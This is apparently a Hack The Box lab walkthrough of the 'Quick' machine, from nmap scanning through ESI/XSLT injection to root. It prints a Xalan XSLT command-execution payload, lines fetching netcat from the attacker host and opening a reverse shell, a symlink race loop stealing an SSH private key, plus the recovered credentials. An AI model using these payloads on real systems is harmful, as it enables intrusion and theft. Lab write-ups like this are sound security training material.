NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-24 15:12 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:12
Completed NSE at 15:12, 0.00s elapsed
Initiating NSE at 15:12
Completed NSE at 15:12, 0.00s elapsed
Initiating NSE at 15:12
Completed NSE at 15:12, 0.00s elapsed
Initiating Ping Scan at 15:12
Scanning 10.10.10.186 [4 ports]
Completed Ping Scan at 15:12, 0.54s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:12
Scanning quick.htb (10.10.10.186) [1000 ports]
Discovered open port 22/tcp on 10.10.10.186
Discovered open port 9001/tcp on 10.10.10.186
Completed SYN Stealth Scan at 15:12, 3.20s elapsed (1000 total ports)
Initiating Service scan at 15:12
Scanning 2 services on quick.htb (10.10.10.186)
Completed Service scan at 15:12, 12.20s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against quick.htb (10.10.10.186)
Retrying OS detection (try #2) against quick.htb (10.10.10.186)
Retrying OS detection (try #3) against quick.htb (10.10.10.186)
Retrying OS detection (try #4) against quick.htb (10.10.10.186)
Retrying OS detection (try #5) against quick.htb (10.10.10.186)
Initiating Traceroute at 15:12
Completed Traceroute at 15:12, 0.61s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:12
Completed Parallel DNS resolution of 2 hosts. at 15:12, 0.61s elapsed
NSE: Script scanning 10.10.10.186.
Initiating NSE at 15:12
Completed NSE at 15:13, 30.88s elapsed
Initiating NSE at 15:13
Completed NSE at 15:14, 60.00s elapsed
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Nmap scan report for quick.htb (10.10.10.186)
Host is up (0.30s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fb:b0:61:82:39:50:4b:21:a8:62:98:4c:9c:38:82:70 (RSA)
| 256 ee:bb:4b:72:63:17:10:ee:08:ff:e5:86:71:fe:8f:80 (ECDSA)
|_ 256 80:a6:c2:73:41:f0:35:4e:5f:61:a7:6a:50:ea:b8:2e (ED25519)
9001/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Quick | Broadband Services
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=7/24%OT=22%CT=1%CU=42891%PV=Y%DS=2%DC=T%G=Y%TM=5F1AAD7
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=104%GCD=1%ISR=109%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O
OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=FE88%W2=
OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 6.804 days (since Fri Jul 17 19:56:43 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 607.59 ms 10.10.14.1
2 607.72 ms quick.htb (10.10.10.186)
NSE: Script Post-scanning.
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.03 seconds
Raw packets sent: 1130 (53.928KB) | Rcvd: 1089 (48.609KB)
PORT 9001 ENUMERATION
LOGIN PAGE:
Here We have portal link which we cannot access directly So to access that we heed to use http3-client QUICHE
So through above link we can access this link as shown below:
┌─[root@liquid]─[~/Tools/quiche/target/debug/examples]
└──╼ #RUST_LOG="info" ./http3-client https://portal.quick.htb
<html>
<title> Quick | Customer Portal</title>
<h1>Quick | Portal</h1>
<head>
<style>
ul {
list-style-type: none;
margin: 0;
padding: 0;
width: 200px;
background-color: #f1f1f1;
}
li a {
display: block;
color: #000;
padding: 8px 16px;
text-decoration: none;
}
/* Change the link color on hover */
li a:hover {
background-color: #555;
color: white;
}
</style>
</head>
<body>
<p> Welcome to Quick User Portal</p>
<ul>
<li><a href="index.php">Home</a></li>
<li><a href="index.php?view=contact">Contact</a></li>
<li><a href="index.php?view=about">About</a></li>
<li><a href="index.php?view=docs">References</a></li>
</ul>
</html>
Here we have a directory named DOCS which we will be accessing now
┌─[root@liquid]─[~/Tools/quiche/target/debug/examples] └──╼ #RUST_LOG="info" ./http3-client https://portal.quick.htb?view=docs <!DOCTYPE html> <html> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <h1>Quick | References</h1> <ul> <li><a href="docs/QuickStart.pdf">Quick-Start Guide</a></li> <li><a href="docs/Connectivity.pdf">Connectivity Guide</a></li> </ul> </head> </html>
So Lets get this PDF :
┌─[root@liquid]─[~/Tools/quiche/target/debug/examples] └──╼ #RUST_LOG="info" ./http3-client https://portal.quick.htb/docs/Connectivity.pdf > Connectivity.pdf
In this PDF we have password but for that we need email also to login
So we have Some names and companies in TESTIMONIALS AND CLIENTS
So we will be crating 3 wordlists as names,company,TLD(top level domain)
after that we will be using this script made by me:
#!/bin/bash for i in $(cat clients.txt) do for j in $(cat company.txt) do for k in $(cat tld.txt) do echo $i@$j.$k done done done
From Where we will get our emails and after fuzzing through every mail we will get our valid mail for fuzzing i tried it on BURP SUITE
Elisa@Wink.co.uk : Quick4cc3$$
After login using these credentials we will see SEARCH AND RASING TICKET OPTIONS.
So we will first send this through burp where we will see that we have ESIGATE something which after searching we will see that it can be exploited
Here in above picture we see that we have ESIGATE So to understand this we have exploit here
https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/
Here we have to create 2 files XML and XSL which we will be sending through this link
<esi:include src="http://10.10.14.90/b.xml" stylesheet="http://10.10.14.90/a.xsl"> </esi:include>
After sending it through describe part we will raise ticket which will give us ticket number through which we can trigger the ticket number in search bar.
Where B.XML will be empty and A.XSL will contain main code
<?xml version="1.0" ?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:output method="xml" omit-xml-declaration="yes"/> <xsl:template match="/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"> <root> <xsl:variable name="cmd"><![CDATA[touch /tmp/pwned]]></xsl:variable> <xsl:variable name="rtObj" select="rt:getRuntime()"/> <xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/> Process: <xsl:value-of select="$process"/> Command: <xsl:value-of select="$cmd"/> </root> </xsl:template> </xsl:stylesheet>
Here we just have to change data in this part [CDATA[touch /tmp/pwned]]
So we will be sending request 3 times and do remember to change file name everytime both xsl and xml filename. Also we need to turn our Python server on port 80 ON so that our script could execute this payload
[CDATA[wget http://10.10.14.90/nc]] —-> nc from /usr/bin/nc
[CDATA[chmod +x nc]]
[CDATA[./nc 10.10.14.90 9002 -e /bin/bash]]
Script will look like this
<?xml version="1.0" ?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:output method="xml" omit-xml-declaration="yes"/> <xsl:template match="/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"> <root> <xsl:variable name="cmd"><![CDATA[./nc 10.10.14.90 9002 -e /bin/bash]]></xsl:variable> <xsl:variable name="rtObj" select="rt:getRuntime()"/> <xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/> Process: <xsl:value-of select="$process"/> Command: <xsl:value-of select="$cmd"/> </root> </xsl:template> </xsl:stylesheet>
So sending data and triggering ticket will look like this :
When we trigger for third ticket we will get our shell on netcat
It Will Look like this:
┌─[root@liquid]─[~/Desktop/HTB/quickC] └──╼ #rlwrap nc -lnvp 9002 listening on [any] 9002 ... connect to [10.10.14.90] from (UNKNOWN) [10.10.10.186] 45588 id uid=1000(sam) gid=1000(sam) groups=1000(sam) pwd /home/sam
So here I tried to get ssh keys by generating them their but what we have to do to get better access we generate SSH KEYS in our machine and copy public keys to sam’s authorized_keys after making .ssh folder.
sam@quick:~/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDr5QKgmZVp2ThreC4sryAUXCJMlU7BGiwvfpcUOW1P2XKFl6XTaGk437IReELcuAK+qqTimOqj0zaPJukZRmWG+AxrBVBAtQJ4625JFhnZjDhXv77O+x+Qqak2nMFT8PueiGl5AcXkIwXPFi8GvKNn8zcLu7UQuzQJsZIiynhppEePhg9hDq5dCR6fWY8j2m9WHpZy2VRKeLZWeRbHzZlF3HQgQYjQCKRz4gYp4sffifsRGVItg8DPY0zifQtuocv/hmcxA35Sa0Vo1SMDRHCQkfihwbkFnFAFo4BDX/W1ku4UmutJngi5j2bM0T4/YN8RfXu6AwcqdRj9m+Gzht9J6qCrPVhJN1T6KZxOju9ukdmhKnOOBSoUXdo4sBYTt9teTfzTkaUdo2cRqdBcEexJM7HZ6m6eRAdvb9FTgySDgQ64aD2sfTWzr1XWTEa7laAGxVr2evKbAFwbGqdp4Uxa+8Trt4xlv8wVZUzTyMlQEkEB3Xak8ifTFIL3JmGx/X0= root@liquid' > authorized_keys
GETTING USER ACCESS
We will just SSH into user SAM
┌─[root@liquid]─[~/Desktop/HTB/quickC]
└──╼ #ssh -i id_rsa sam@10.10.10.186
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Jul 24 15:46:22 UTC 2020
System load: 0.0 Users logged in: 1
Usage of /: 30.4% of 19.56GB IP address for ens33: 10.10.10.186
Memory usage: 17% IP address for br-9ef1bb2e82cd: 172.18.0.1
Swap usage: 0% IP address for docker0: 172.17.0.1
Processes: 135
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
54 packages can be updated.
28 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Mar 20 01:33:16 2020
sam@quick:~$ ls
esigate-distribution-5.2 nc nc.exe user.txt
sam@quick:~$ cat user.txt
650182418e93bf5a83d054b4841f3616
Now Here we will see that we have mysql named file and also mysql is listening on localhost. So we may need to find its pass and user.
So Lets got for /var/www folder where we will see other interesting folders
So Here we will first getting into printers one where we have db.php which is containing password for mysql
“localhost”,”db_adm”,”db_p4ss”,”quick”
MYSQL
sam@quick:/var/www/printer$ mysql quick -u db_adm -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 276
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases
-> ;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| quick |
| sys |
+--------------------+
5 rows in set (0.00 sec)
mysql> use quick
Database changed
mysql> show tables;
+-----------------+
| Tables_in_quick |
+-----------------+
| jobs |
| tickets |
| users |
+-----------------+
3 rows in set (0.00 sec)
mysql> select * from users;
+--------------+------------------+----------------------------------+
| name | email | password |
+--------------+------------------+----------------------------------+
| Elisa | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d |
| Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 |
+--------------+------------------+----------------------------------+
Here we have hashes which after decoding from md5 then DES we will get
e626d51f8fbfd1124fdea88396c35d05 > fajxXl5T9swMM > yl51pbx
So Here we have this password but we need to use it somewhere so to that we need to get printers folder history
So here we will be using command apachectl -S which will give output as following
sam@quick:/var/www/printer$ apachectl -S
AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1. Set the 'ServerName' directive globally to suppress this message
VirtualHost configuration:
*:80 is a NameVirtualHost
default server 127.0.1.1 (/etc/apache2/sites-enabled/000-default.conf:1)
port 80 namevhost 127.0.1.1 (/etc/apache2/sites-enabled/000-default.conf:1)
port 80 namevhost printerv2.quick.htb (/etc/apache2/sites-enabled/000-default.conf:30)
ServerRoot: "/etc/apache2"
Main DocumentRoot: "/var/www/html"
Main ErrorLog: "/var/log/apache2/error.log"
Mutex default: dir="/var/run/apache2/" mechanism=default
Mutex mpm-accept: using_defaults
Mutex watchdog-callback: using_defaults
PidFile: "/var/run/apache2/apache2.pid"
Define: DUMP_VHOSTS
Define: DUMP_RUN_CFG
User: name="www-data" id=33 not_used
Group: name="www-data" id=33 not_used
Here printerv2.quick.htb is listening on local host so we will be port forwarding this to our machine and will be enumerating it
command to port forward we will be using same ssh key with little change in command
ssh -i id_rsa -L 80:127.0.0.1:80 sam@10.10.10.186
So here we will login using the above mail and password
So here we will be checking job.php file where it is taking IP and PORT from the page which looks like this
Here we will be specifying port and ip where we will listen as in job.php it is taking file fro their and will display it on netcat IP. which can be abused by directing it to srvadm ‘s ssh key
cd /var/www/jobs;
while true;
do
for file in $(ls .);
do
rm -rf $file;
ln -s /home/srvadm/.ssh/id_rsa $file;
done
done
Here I took help from my dscord friend
Now here it is going to delet evry file and create a new one which will be the name of file as /home/srvadm/.ssh.id_rsa
after that we will have shell as this
┌─[root@liquid]─[~/Desktop/HTB/quickC] └──╼ #nc -lnvp 9004 listening on [any] 9004 ... -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEAutSlpZLFoQfbaRT7O8rP8LsjE84QJPeWQJji6MF0S/RGCd4P AP1UWD26CAaDy4J7B2f5M/o5XEYIZeR+KKSh+mD//FOy+O3sqIX37anFqqvhJQ6D 1L2WOskWoyZzGqb8r94gN9TXW8TRlz7hMqq2jfWBgGm3YVzMKYSYsWi6dVYTlVGY DLNb/88agUQGR8cANRis/2ckWK+GiyTo5pgZacnSN/61p1Ctv0IC/zCOI5p9CKnd whOvbmjzNvh/b0eXbYQ/Rp5ryLuSJLZ1aPrtK+LCnqjKK0hwH8gKkdZk/d3Ofq4i hRiQlakwPlsHy2am1O+smg0214HMyQQdn7lE9QIDAQABAoIBAG2zSKQkvxgjdeiI ok/kcR5ns1wApagfHEFHxAxo8vFaN/m5QlQRa4H4lI/7y00mizi5CzFC3oVYtbum Y5FXwagzZntxZegWQ9xb9Uy+X8sr6yIIGM5El75iroETpYhjvoFBSuedeOpwcaR+ DlritBg8rFKLQFrR0ysZqVKaLMmRxPutqvhd1vOZDO4R/8ZMKggFnPC03AkgXkp3 j8+ktSPW6THykwGnHXY/vkMAS2H3dBhmecA/Ks6V8h5htvybhDLuUMd++K6Fqo/B H14kq+y0Vfjs37vcNR5G7E+7hNw3zv5N8uchP23TZn2MynsujZ3TwbwOV5pw/CxO 9nb7BSECgYEA5hMD4QRo35OwM/LCu5XCJjGardhHn83OIPUEmVePJ1SGCam6oxvc bAA5n83ERMXpDmE4I7y3CNrd9DS/uUae9q4CN/5gjEcc9Z1E81U64v7+H8VK3rue F6PinFsdov50tWJbxSYr0dIktSuUUPZrR+in5SOzP77kxZL4QtRE710CgYEAz+It T/TMzWbl+9uLAyanQObr5gD1UmG5fdYcutTB+8JOXGKFDIyY+oVMwoU1jzk7KUtw 8MzyuG8D1icVysRXHU8btn5t1l51RXu0HsBmJ9LaySWFRbNt9bc7FErajJr8Dakj b4gu9IKHcGchN2akH3KZ6lz/ayIAxFtadrTMinkCgYEAxpZzKq6btx/LX4uS+kdx pXX7hULBz/XcjiXvKkyhi9kxOPX/2voZcD9hfcYmOxZ466iOxIoHkuUX38oIEuwa GeJol9xBidN386kj8sUGZxiiUNoCne5jrxQObddX5XCtXELh43HnMNyqQpazFo8c Wp0/DlGaTtN+s+r/zu9Z8SECgYEAtfvuZvyK/ZWC6AS9oTiJWovNH0DfggsC82Ip LHVsjBUBvGaSyvWaRlXDaNZsmMElRXVBncwM/+BPn33/2c4f5QyH2i67wNpYF0e/ 2tvbkilIVqZ+ERKOxHhvQ8hzontbBCp5Vv4E/Q/3uTLPJUy5iL4ud7iJ8SOHQF4o x5pnJSECgYEA4gk6oVOHMVtxrXh3ASZyQIn6VKO+cIXHj72RAsFAD/98intvVsA3 +DvKZu+NeroPtaI7NZv6muiaK7ZZgGcp4zEHRwxM+xQvxJpd3YzaKWZbCIPDDT/u NJx1AkN7Gr9v4WjccrSk1hitPE1w6cmBNStwaQWD+KUUEeWYUAx20RA= -----END RSA PRIVATE KEY-----
Here we go with our SSH keys
GETTING 2ND USER ACCESS
Lets SSH into the user srvadm
┌─[✗]─[root@liquid]─[~/Desktop/HTB/quickC]
└──╼ #ssh -i id_rsaadmin srvadm@10.10.10.186
load pubkey "id_rsaadmin": invalid format
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Jul 24 18:07:20 UTC 2020
System load: 0.0 Users logged in: 1
Usage of /: 30.4% of 19.56GB IP address for ens33: 10.10.10.186
Memory usage: 18% IP address for br-9ef1bb2e82cd: 172.18.0.1
Swap usage: 0% IP address for docker0: 172.17.0.1
Processes: 138
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
54 packages can be updated.
28 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Jul 24 16:29:03 2020 from 10.10.14.90
srvadm@quick:~$ id
uid=1001(srvadm) gid=1001(srvadm) groups=1001(srvadm),999(printers)
srvadm@quick:~$
Here we go With our 2nd user access
GETTING ROOT ACCESS
Here we dont have password for this user
So we will just be checking files and folders in this directory
From where we will get password for root
srvadm@quick:~$ id uid=1001(srvadm) gid=1001(srvadm) groups=1001(srvadm),999(printers) srvadm@quick:~$ ls -la total 36 drwxr-xr-x 6 srvadm srvadm 4096 Mar 20 06:37 . drwxr-xr-x 4 root root 4096 Mar 20 02:16 .. lrwxrwxrwx 1 srvadm srvadm 9 Mar 20 02:38 .bash_history -> /dev/null -rw-r--r-- 1 srvadm srvadm 220 Mar 20 02:16 .bash_logout -rw-r--r-- 1 srvadm srvadm 3771 Mar 20 02:16 .bashrc drwx------ 5 srvadm srvadm 4096 Mar 20 06:20 .cache drwx------ 3 srvadm srvadm 4096 Mar 20 02:38 .gnupg drwxrwxr-x 3 srvadm srvadm 4096 Mar 20 06:37 .local -rw-r--r-- 1 srvadm srvadm 807 Mar 20 02:16 .profile drwx------ 2 srvadm srvadm 4096 Mar 20 02:38 .ssh srvadm@quick:~$ cd .cache/ srvadm@quick:~/.cache$ ls conf.d logs motd.legal-displayed packages srvadm@quick:~/.cache$ cd conf.d/ srvadm@quick:~/.cache/conf.d$ ls cupsd.conf printers.conf srvadm@quick:~/.cache/conf.d$ cat printers.conf # Printer configuration file for CUPS v2.3.0 # Written by cupsd on 2020-02-18 17:11 # DO NOT EDIT THIS FILE WHEN CUPSD IS RUNNING NextPrinterId 5 <------> MakeModel KONICA MINOLTA C554SeriesPS(P) DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer State Idle <------>
Here we have a string which looks URL encoded SO after decoding it we will get some password
%26ftQ4K3SGde8%3F >> &ftQ4K3SGde8?
LETS SU TO ROOT AND GET ROOT FLAG!
srvadm@quick:~/.cache/conf.d$ su root Password: root@quick:/home/srvadm/.cache/conf.d# cd root@quick:~# pwd /root root@quick:~# id uid=0(root) gid=0(root) groups=0(root) root@quick:~# cat root.txt 6c11493e99685f709a1fc2ff03a4404a root@quick:~#
Here we go with our root flag!!
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
